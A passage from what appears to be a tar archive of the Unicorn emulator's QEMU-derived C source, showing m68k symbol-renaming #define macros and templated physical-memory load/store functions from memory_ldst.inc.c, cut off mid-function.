helper_atomic_fetch_smaxq_be_m68k #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_m68k #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_m68k #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_m68k #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_m68k #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_m68k #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_m68k #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_m68k #define cpu_ldub_code cpu_ldub_code_m68k #define cpu_lduw_code cpu_lduw_code_m68k #define cpu_ldl_code cpu_ldl_code_m68k #define cpu_ldq_code cpu_ldq_code_m68k #define helper_div_i32 helper_div_i32_m68k #define helper_rem_i32 helper_rem_i32_m68k #define helper_divu_i32 helper_divu_i32_m68k #define helper_remu_i32 helper_remu_i32_m68k #define helper_shl_i64 helper_shl_i64_m68k #define helper_shr_i64 helper_shr_i64_m68k #define helper_sar_i64 helper_sar_i64_m68k #define helper_div_i64 helper_div_i64_m68k #define helper_rem_i64 helper_rem_i64_m68k #define helper_divu_i64 helper_divu_i64_m68k #define helper_remu_i64 helper_remu_i64_m68k #define helper_muluh_i64 helper_muluh_i64_m68k #define helper_mulsh_i64 helper_mulsh_i64_m68k #define helper_clz_i32 helper_clz_i32_m68k #define helper_ctz_i32 helper_ctz_i32_m68k #define helper_clz_i64 helper_clz_i64_m68k #define helper_ctz_i64 helper_ctz_i64_m68k #define helper_clrsb_i32 helper_clrsb_i32_m68k #define helper_clrsb_i64 helper_clrsb_i64_m68k #define helper_ctpop_i32 helper_ctpop_i32_m68k #define helper_ctpop_i64 helper_ctpop_i64_m68k #define helper_lookup_tb_ptr helper_lookup_tb_ptr_m68k #define helper_exit_atomic helper_exit_atomic_m68k #define helper_gvec_add8 helper_gvec_add8_m68k #define helper_gvec_add16 helper_gvec_add16_m68k #define helper_gvec_add32 helper_gvec_add32_m68k #define helper_gvec_add64 helper_gvec_add64_m68k #define helper_gvec_adds8 helper_gvec_adds8_m68k #define helper_gvec_adds16 helper_gvec_adds16_m68k #define helper_gvec_adds32 helper_gvec_adds32_m68k #define helper_gvec_adds64 helper_gvec_adds64_m68k #define helper_gvec_sub8 helper_gvec_sub8_m68k #define helper_gvec_sub16 helper_gvec_sub16_m68k #define helper_gvec_sub32 helper_gvec_sub32_m68k #define helper_gvec_sub64 helper_gvec_sub64_m68k #define helper_gvec_subs8 helper_gvec_subs8_m68k #define helper_gvec_subs16 helper_gvec_subs16_m68k #define helper_gvec_subs32 helper_gvec_subs32_m68k #define helper_gvec_subs64 helper_gvec_subs64_m68k #define helper_gvec_mul8 helper_gvec_mul8_m68k #define helper_gvec_mul16 helper_gvec_mul16_m68k #define helper_gvec_mul32 helper_gvec_mul32_m68k #define helper_gvec_mul64 helper_gvec_mul64_m68k #define helper_gvec_muls8 helper_gvec_muls8_m68k #define helper_gvec_muls16 helper_gvec_muls16_m68k #define helper_gvec_muls32 helper_gvec_muls32_m68k #define helper_gvec_muls64 helper_gvec_muls64_m68k #define helper_gvec_neg8 helper_gvec_neg8_m68k #define helper_gvec_neg16 helper_gvec_neg16_m68k #define helper_gvec_neg32 helper_gvec_neg32_m68k #define helper_gvec_neg64 helper_gvec_neg64_m68k #define helper_gvec_abs8 helper_gvec_abs8_m68k #define helper_gvec_abs16 helper_gvec_abs16_m68k #define helper_gvec_abs32 helper_gvec_abs32_m68k #define helper_gvec_abs64 helper_gvec_abs64_m68k #define helper_gvec_mov helper_gvec_mov_m68k #define helper_gvec_dup64 helper_gvec_dup64_m68k #define helper_gvec_dup32 helper_gvec_dup32_m68k #define helper_gvec_dup16 helper_gvec_dup16_m68k #define helper_gvec_dup8 helper_gvec_dup8_m68k #define helper_gvec_not helper_gvec_not_m68k #define helper_gvec_and helper_gvec_and_m68k #define helper_gvec_or helper_gvec_or_m68k #define helper_gvec_xor helper_gvec_xor_m68k #define helper_gvec_andc helper_gvec_andc_m68k #define helper_gvec_orc helper_gvec_orc_m68k #define helper_gvec_nand helper_gvec_nand_m68k #define helper_gvec_nor helper_gvec_nor_m68k #define helper_gvec_eqv helper_gvec_eqv_m68k #define helper_gvec_ands helper_gvec_ands_m68k #define helper_gvec_xors helper_gvec_xors_m68k #define helper_gvec_ors helper_gvec_ors_m68k #define helper_gvec_shl8i helper_gvec_shl8i_m68k #define helper_gvec_shl16i helper_gvec_shl16i_m68k #define helper_gvec_shl32i helper_gvec_shl32i_m68k #define helper_gvec_shl64i helper_gvec_shl64i_m68k #define helper_gvec_shr8i helper_gvec_shr8i_m68k #define helper_gvec_shr16i helper_gvec_shr16i_m68k #define helper_gvec_shr32i helper_gvec_shr32i_m68k #define helper_gvec_shr64i helper_gvec_shr64i_m68k #define helper_gvec_sar8i helper_gvec_sar8i_m68k #define helper_gvec_sar16i helper_gvec_sar16i_m68k #define helper_gvec_sar32i helper_gvec_sar32i_m68k #define helper_gvec_sar64i helper_gvec_sar64i_m68k #define helper_gvec_shl8v helper_gvec_shl8v_m68k #define helper_gvec_shl16v helper_gvec_shl16v_m68k #define helper_gvec_shl32v helper_gvec_shl32v_m68k #define helper_gvec_shl64v helper_gvec_shl64v_m68k #define helper_gvec_shr8v helper_gvec_shr8v_m68k #define helper_gvec_shr16v helper_gvec_shr16v_m68k #define helper_gvec_shr32v helper_gvec_shr32v_m68k #define helper_gvec_shr64v helper_gvec_shr64v_m68k #define helper_gvec_sar8v helper_gvec_sar8v_m68k #define helper_gvec_sar16v helper_gvec_sar16v_m68k #define helper_gvec_sar32v helper_gvec_sar32v_m68k #define helper_gvec_sar64v helper_gvec_sar64v_m68k #define helper_gvec_eq8 helper_gvec_eq8_m68k #define helper_gvec_ne8 helper_gvec_ne8_m68k #define helper_gvec_lt8 helper_gvec_lt8_m68k #define helper_gvec_le8 helper_gvec_le8_m68k #define helper_gvec_ltu8 helper_gvec_ltu8_m68k #define helper_gvec_leu8 helper_gvec_leu8_m68k #define helper_gvec_eq16 helper_gvec_eq16_m68k #define helper_gvec_ne16 helper_gvec_ne16_m68k #define helper_gvec_lt16 helper_gvec_lt16_m68k #define helper_gvec_le16 helper_gvec_le16_m68k #define helper_gvec_ltu16 helper_gvec_ltu16_m68k #define helper_gvec_leu16 helper_gvec_leu16_m68k #define helper_gvec_eq32 helper_gvec_eq32_m68k #define helper_gvec_ne32 helper_gvec_ne32_m68k #define helper_gvec_lt32 helper_gvec_lt32_m68k #define helper_gvec_le32 helper_gvec_le32_m68k #define helper_gvec_ltu32 helper_gvec_ltu32_m68k #define helper_gvec_leu32 helper_gvec_leu32_m68k #define helper_gvec_eq64 helper_gvec_eq64_m68k #define helper_gvec_ne64 helper_gvec_ne64_m68k #define helper_gvec_lt64 helper_gvec_lt64_m68k #define helper_gvec_le64 helper_gvec_le64_m68k #define helper_gvec_ltu64 helper_gvec_ltu64_m68k #define helper_gvec_leu64 helper_gvec_leu64_m68k #define helper_gvec_ssadd8 helper_gvec_ssadd8_m68k #define helper_gvec_ssadd16 helper_gvec_ssadd16_m68k #define helper_gvec_ssadd32 helper_gvec_ssadd32_m68k #define helper_gvec_ssadd64 helper_gvec_ssadd64_m68k #define helper_gvec_sssub8 helper_gvec_sssub8_m68k #define helper_gvec_sssub16 helper_gvec_sssub16_m68k #define helper_gvec_sssub32 helper_gvec_sssub32_m68k #define helper_gvec_sssub64 helper_gvec_sssub64_m68k #define helper_gvec_usadd8 helper_gvec_usadd8_m68k #define helper_gvec_usadd16 helper_gvec_usadd16_m68k #define helper_gvec_usadd32 helper_gvec_usadd32_m68k #define helper_gvec_usadd64 helper_gvec_usadd64_m68k #define helper_gvec_ussub8 helper_gvec_ussub8_m68k #define helper_gvec_ussub16 helper_gvec_ussub16_m68k #define helper_gvec_ussub32 helper_gvec_ussub32_m68k #define helper_gvec_ussub64 helper_gvec_ussub64_m68k #define helper_gvec_smin8 helper_gvec_smin8_m68k #define helper_gvec_smin16 helper_gvec_smin16_m68k #define helper_gvec_smin32 helper_gvec_smin32_m68k #define helper_gvec_smin64 helper_gvec_smin64_m68k #define helper_gvec_smax8 helper_gvec_smax8_m68k #define helper_gvec_smax16 helper_gvec_smax16_m68k #define helper_gvec_smax32 helper_gvec_smax32_m68k #define helper_gvec_smax64 helper_gvec_smax64_m68k #define helper_gvec_umin8 helper_gvec_umin8_m68k #define helper_gvec_umin16 helper_gvec_umin16_m68k #define helper_gvec_umin32 helper_gvec_umin32_m68k #define helper_gvec_umin64 helper_gvec_umin64_m68k #define helper_gvec_umax8 helper_gvec_umax8_m68k #define helper_gvec_umax16 helper_gvec_umax16_m68k #define helper_gvec_umax32 helper_gvec_umax32_m68k #define helper_gvec_umax64 helper_gvec_umax64_m68k #define helper_gvec_bitsel helper_gvec_bitsel_m68k #define cpu_restore_state cpu_restore_state_m68k #define page_collection_lock page_collection_lock_m68k #define page_collection_unlock page_collection_unlock_m68k #define free_code_gen_buffer free_code_gen_buffer_m68k #define tcg_exec_init tcg_exec_init_m68k #define tb_cleanup tb_cleanup_m68k #define tb_flush tb_flush_m68k #define tb_phys_invalidate tb_phys_invalidate_m68k #define tb_gen_code tb_gen_code_m68k #define tb_exec_lock tb_exec_lock_m68k #define tb_exec_unlock tb_exec_unlock_m68k #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_m68k #define tb_invalidate_phys_range tb_invalidate_phys_range_m68k #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_m68k #define tb_check_watchpoint tb_check_watchpoint_m68k #define cpu_io_recompile cpu_io_recompile_m68k #define tb_flush_jmp_cache tb_flush_jmp_cache_m68k #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_m68k #define translator_loop_temp_check translator_loop_temp_check_m68k #define translator_loop translator_loop_m68k #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_m68k #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_m68k #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_m68k #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_m68k #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_m68k #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_m68k #define unassigned_mem_ops unassigned_mem_ops_m68k #define floatx80_infinity floatx80_infinity_m68k #define dup_const_func dup_const_func_m68k #define gen_helper_raise_exception gen_helper_raise_exception_m68k #define gen_helper_raise_interrupt gen_helper_raise_interrupt_m68k #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_m68k #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_m68k #define gen_helper_cpsr_read gen_helper_cpsr_read_m68k #define gen_helper_cpsr_write gen_helper_cpsr_write_m68k #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_m68k #define cpu_m68k_init cpu_m68k_init_m68k #define helper_reds32 helper_reds32_m68k #define helper_redf32 helper_redf32_m68k #define helper_exts32 helper_exts32_m68k #define helper_extf32 helper_extf32_m68k #define helper_extf64 helper_extf64_m68k #define helper_redf64 helper_redf64_m68k #define helper_firound helper_firound_m68k #define cpu_m68k_set_fpcr cpu_m68k_set_fpcr_m68k #define helper_fitrunc helper_fitrunc_m68k #define helper_set_fpcr helper_set_fpcr_m68k #define helper_fsround helper_fsround_m68k #define helper_fdround helper_fdround_m68k #define helper_fsqrt helper_fsqrt_m68k #define helper_fssqrt helper_fssqrt_m68k #define helper_fdsqrt helper_fdsqrt_m68k #define helper_fabs helper_fabs_m68k #define helper_fsabs helper_fsabs_m68k #define helper_fdabs helper_fdabs_m68k #define helper_fneg helper_fneg_m68k #define helper_fsneg helper_fsneg_m68k #define helper_fdneg helper_fdneg_m68k #define helper_fadd helper_fadd_m68k #define helper_fsadd helper_fsadd_m68k #define helper_fdadd helper_fdadd_m68k #define helper_fsub helper_fsub_m68k #define helper_fssub helper_fssub_m68k #define helper_fdsub helper_fdsub_m68k #define helper_fmul helper_fmul_m68k #define helper_fsmul helper_fsmul_m68k #define helper_fdmul helper_fdmul_m68k #define helper_fsglmul helper_fsglmul_m68k #define helper_fdiv helper_fdiv_m68k #define helper_fsdiv helper_fsdiv_m68k #define helper_fddiv helper_fddiv_m68k #define helper_fsgldiv helper_fsgldiv_m68k #define helper_fcmp helper_fcmp_m68k #define helper_ftst helper_ftst_m68k #define helper_fconst helper_fconst_m68k #define helper_fmovemx_st_predec helper_fmovemx_st_predec_m68k #define helper_fmovemx_st_postinc helper_fmovemx_st_postinc_m68k #define helper_fmovemx_ld_postinc helper_fmovemx_ld_postinc_m68k #define helper_fmovemd_st_predec helper_fmovemd_st_predec_m68k #define helper_fmovemd_st_postinc helper_fmovemd_st_postinc_m68k #define helper_fmovemd_ld_postinc helper_fmovemd_ld_postinc_m68k #define helper_fmod helper_fmod_m68k #define helper_frem helper_frem_m68k #define helper_fgetexp helper_fgetexp_m68k #define helper_fgetman helper_fgetman_m68k #define helper_fscale helper_fscale_m68k #define helper_flognp1 helper_flognp1_m68k #define helper_flogn helper_flogn_m68k #define helper_flog10 helper_flog10_m68k #define helper_flog2 helper_flog2_m68k #define helper_fetox helper_fetox_m68k #define helper_ftwotox helper_ftwotox_m68k #define helper_ftentox helper_ftentox_m68k #define helper_ftan helper_ftan_m68k #define helper_fsin helper_fsin_m68k #define helper_fcos helper_fcos_m68k #define helper_fsincos helper_fsincos_m68k #define helper_fatan helper_fatan_m68k #define helper_fasin helper_fasin_m68k #define helper_facos helper_facos_m68k #define helper_fatanh helper_fatanh_m68k #define helper_ftanh helper_ftanh_m68k #define helper_fsinh helper_fsinh_m68k #define helper_fcosh helper_fcosh_m68k #define helper_cf_movec_to helper_cf_movec_to_m68k #define helper_m68k_movec_to helper_m68k_movec_to_m68k #define helper_m68k_movec_from helper_m68k_movec_from_m68k #define helper_set_macsr helper_set_macsr_m68k #define m68k_switch_sp m68k_switch_sp_m68k #define m68k_cpu_get_phys_page_debug m68k_cpu_get_phys_page_debug_m68k #define m68k_set_irq_level m68k_set_irq_level_m68k #define m68k_cpu_tlb_fill m68k_cpu_tlb_fill_m68k #define helper_bitrev helper_bitrev_m68k #define helper_ff1 helper_ff1_m68k #define helper_sats helper_sats_m68k #define cpu_m68k_set_sr cpu_m68k_set_sr_m68k #define helper_set_sr helper_set_sr_m68k #define helper_mac_move helper_mac_move_m68k #define helper_macmuls helper_macmuls_m68k #define helper_macmulu helper_macmulu_m68k #define helper_macmulf helper_macmulf_m68k #define helper_macsats helper_macsats_m68k #define helper_macsatu helper_macsatu_m68k #define helper_macsatf helper_macsatf_m68k #define helper_mac_set_flags helper_mac_set_flags_m68k #define cpu_m68k_get_ccr cpu_m68k_get_ccr_m68k #define helper_get_ccr helper_get_ccr_m68k #define cpu_m68k_set_ccr cpu_m68k_set_ccr_m68k #define helper_set_ccr helper_set_ccr_m68k #define helper_flush_flags helper_flush_flags_m68k #define helper_get_macf helper_get_macf_m68k #define helper_get_macs helper_get_macs_m68k #define helper_get_macu helper_get_macu_m68k #define helper_get_mac_extf helper_get_mac_extf_m68k #define helper_get_mac_exti helper_get_mac_exti_m68k #define helper_set_mac_extf helper_set_mac_extf_m68k #define helper_set_mac_exts helper_set_mac_exts_m68k #define helper_set_mac_extu helper_set_mac_extu_m68k #define helper_ptest helper_ptest_m68k #define helper_pflush helper_pflush_m68k #define helper_reset helper_reset_m68k #define m68k_cpu_do_interrupt m68k_cpu_do_interrupt_m68k #define m68k_cpu_transaction_failed m68k_cpu_transaction_failed_m68k #define m68k_cpu_exec_interrupt m68k_cpu_exec_interrupt_m68k #define helper_raise_exception helper_raise_exception_m68k #define helper_divuw helper_divuw_m68k #define helper_divsw helper_divsw_m68k #define helper_divul helper_divul_m68k #define helper_divsl helper_divsl_m68k #define helper_divull helper_divull_m68k #define helper_divsll helper_divsll_m68k #define helper_cas2w helper_cas2w_m68k #define helper_cas2l helper_cas2l_m68k #define helper_cas2l_parallel helper_cas2l_parallel_m68k #define helper_bfexts_mem helper_bfexts_mem_m68k #define helper_bfextu_mem helper_bfextu_mem_m68k #define helper_bfins_mem helper_bfins_mem_m68k #define helper_bfchg_mem helper_bfchg_mem_m68k #define helper_bfclr_mem helper_bfclr_mem_m68k #define helper_bfset_mem helper_bfset_mem_m68k #define helper_bfffo_reg helper_bfffo_reg_m68k #define helper_bfffo_mem helper_bfffo_mem_m68k #define helper_chk helper_chk_m68k #define helper_chk2 helper_chk2_m68k #define floatx80_mod floatx80_mod_m68k #define floatx80_getman floatx80_getman_m68k #define floatx80_getexp floatx80_getexp_m68k #define floatx80_scale floatx80_scale_m68k #define floatx80_move floatx80_move_m68k #define floatx80_lognp1 floatx80_lognp1_m68k #define floatx80_logn floatx80_logn_m68k #define floatx80_log10 floatx80_log10_m68k #define floatx80_log2 floatx80_log2_m68k #define floatx80_etox floatx80_etox_m68k #define floatx80_twotox floatx80_twotox_m68k #define floatx80_tentox floatx80_tentox_m68k #define floatx80_tan floatx80_tan_m68k #define floatx80_sin floatx80_sin_m68k #define floatx80_cos floatx80_cos_m68k #define floatx80_atan floatx80_atan_m68k #define floatx80_asin floatx80_asin_m68k #define floatx80_acos floatx80_acos_m68k #define floatx80_atanh floatx80_atanh_m68k #define floatx80_etoxm1 floatx80_etoxm1_m68k #define floatx80_tanh floatx80_tanh_m68k #define floatx80_sinh floatx80_sinh_m68k #define floatx80_cosh floatx80_cosh_m68k #define m68k_tcg_init m68k_tcg_init_m68k #define register_m68k_insns register_m68k_insns_m68k #define gen_intermediate_code gen_intermediate_code_m68k #define restore_state_to_opc restore_state_to_opc_m68k #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/memory_ldst.inc.c����������������������������������������������������������������0000664�0000000�0000000�00000035417�14675241067�0017437�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Physical memory access templates * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2015 Linaro, Inc. * Copyright (c) 2016 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* warning: addr must be aligned */ static inline uint32_t glue(address_space_ldl_internal, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result, enum device_endian endian) { uint8_t *ptr; uint64_t val; MemoryRegion *mr; hwaddr l = 4; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, false, attrs); if (l < 4 || !memory_access_is_direct(mr, false)) { /* I/O case */ r = memory_region_dispatch_read(uc, mr, addr1, &val, MO_32 | devend_memop(endian), attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); switch (endian) { case DEVICE_LITTLE_ENDIAN: val = ldl_le_p(ptr); break; case DEVICE_BIG_ENDIAN: val = ldl_be_p(ptr); break; default: val = ldl_p(ptr); break; } r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); return val; } uint32_t glue(address_space_ldl, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_ldl_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_NATIVE_ENDIAN); } uint32_t glue(address_space_ldl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_ldl_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_LITTLE_ENDIAN); } uint32_t glue(address_space_ldl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_ldl_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_BIG_ENDIAN); } /* warning: addr must be aligned */ static inline uint64_t glue(address_space_ldq_internal, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result, enum device_endian endian) { uint8_t *ptr; uint64_t val; MemoryRegion *mr; hwaddr l = 8; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, false, attrs); if (l < 8 || !memory_access_is_direct(mr, false)) { /* I/O case */ r = memory_region_dispatch_read(uc, mr, addr1, &val, MO_64 | devend_memop(endian), attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); switch (endian) { case DEVICE_LITTLE_ENDIAN: val = ldq_le_p(ptr); break; case DEVICE_BIG_ENDIAN: val = ldq_be_p(ptr); break; default: val = ldq_p(ptr); break; } r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); return val; } uint64_t glue(address_space_ldq, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_ldq_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_NATIVE_ENDIAN); } uint64_t glue(address_space_ldq_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_ldq_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_LITTLE_ENDIAN); } uint64_t glue(address_space_ldq_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_ldq_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_BIG_ENDIAN); } uint32_t glue(address_space_ldub, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { uint8_t *ptr; uint64_t val; MemoryRegion *mr; hwaddr l = 1; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, false, attrs); if (!memory_access_is_direct(mr, false)) { /* I/O case */ r = memory_region_dispatch_read(uc, mr, addr1, &val, MO_8, attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); val = ldub_p(ptr); r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); return val; } /* warning: addr must be aligned */ static inline uint32_t glue(address_space_lduw_internal, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result, enum device_endian endian) { uint8_t *ptr; uint64_t val; MemoryRegion *mr; hwaddr l = 2; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, false, attrs); if (l < 2 || !memory_access_is_direct(mr, false)) { /* I/O case */ r = memory_region_dispatch_read(uc, mr, addr1, &val, MO_16 | devend_memop(endian), attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); switch (endian) { case DEVICE_LITTLE_ENDIAN: val = lduw_le_p(ptr); break; case DEVICE_BIG_ENDIAN: val = lduw_be_p(ptr); break; default: val = lduw_p(ptr); break; } r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); return val; } uint32_t glue(address_space_lduw, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_lduw_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_NATIVE_ENDIAN); } uint32_t glue(address_space_lduw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_lduw_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_LITTLE_ENDIAN); } uint32_t glue(address_space_lduw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, MemTxAttrs attrs, MemTxResult *result) { return glue(address_space_lduw_internal, SUFFIX)(uc, ARG1, addr, attrs, result, DEVICE_BIG_ENDIAN); } /* warning: addr must be aligned. The ram page is not masked as dirty and the code inside is not invalidated. It is useful if the dirty bits are used to track modified PTEs */ void glue(address_space_stl_notdirty, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { uint8_t *ptr; MemoryRegion *mr; hwaddr l = 4; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, true, attrs); if (l < 4 || !memory_access_is_direct(mr, true)) { r = memory_region_dispatch_write(uc, mr, addr1, val, MO_32, attrs); } else { ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); stl_p(ptr, val); r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); } /* warning: addr must be aligned */ static inline void glue(address_space_stl_internal, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result, enum device_endian endian) { uint8_t *ptr; MemoryRegion *mr; hwaddr l = 4; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, true, attrs); if (l < 4 || !memory_access_is_direct(mr, true)) { r = memory_region_dispatch_write(uc, mr, addr1, val, MO_32 | devend_memop(endian), attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); switch (endian) { case DEVICE_LITTLE_ENDIAN: stl_le_p(ptr, val); break; case DEVICE_BIG_ENDIAN: stl_be_p(ptr, val); break; default: stl_p(ptr, val); break; } invalidate_and_set_dirty(mr, addr1, 4); r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); } void glue(address_space_stl, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stl_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_NATIVE_ENDIAN); } void glue(address_space_stl_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stl_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_LITTLE_ENDIAN); } void glue(address_space_stl_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stl_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_BIG_ENDIAN); } void glue(address_space_stb, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { uint8_t *ptr; MemoryRegion *mr; hwaddr l = 1; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, true, attrs); if (!memory_access_is_direct(mr, true)) { r = memory_region_dispatch_write(uc, mr, addr1, val, MO_8, attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); stb_p(ptr, val); invalidate_and_set_dirty(mr, addr1, 1); r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); } /* warning: addr must be aligned */ static inline void glue(address_space_stw_internal, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result, enum device_endian endian) { uint8_t *ptr; MemoryRegion *mr; hwaddr l = 2; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, true, attrs); if (l < 2 || !memory_access_is_direct(mr, true)) { r = memory_region_dispatch_write(uc, mr, addr1, val, MO_16 | devend_memop(endian), attrs); } else { /* RAM case */ ptr = qemu_map_ram_ptr(mr->uc, mr->ram_block, addr1); switch (endian) { case DEVICE_LITTLE_ENDIAN: stw_le_p(ptr, val); break; case DEVICE_BIG_ENDIAN: stw_be_p(ptr, val); break; default: stw_p(ptr, val); break; } invalidate_and_set_dirty(mr, addr1, 2); r = MEMTX_OK; } if (result) { *result = r; } //RCU_READ_UNLOCK(); } void glue(address_space_stw, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stw_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_NATIVE_ENDIAN); } void glue(address_space_stw_le, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stw_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_LITTLE_ENDIAN); } void glue(address_space_stw_be, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val, MemTxAttrs attrs, MemTxResult *result) { glue(address_space_stw_internal, SUFFIX)(uc, ARG1, addr, val, attrs, result, DEVICE_BIG_ENDIAN); } static void glue(address_space_stq_internal, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val, MemTxAttrs attrs, MemTxResult *result, enum device_endian endian) { uint8_t *ptr; MemoryRegion *mr; hwaddr l = 8; hwaddr addr1; MemTxResult r; //RCU_READ_LOCK(); mr = TRANSLATE(addr, &addr1, &l, true, attrs); if (l < 8 || 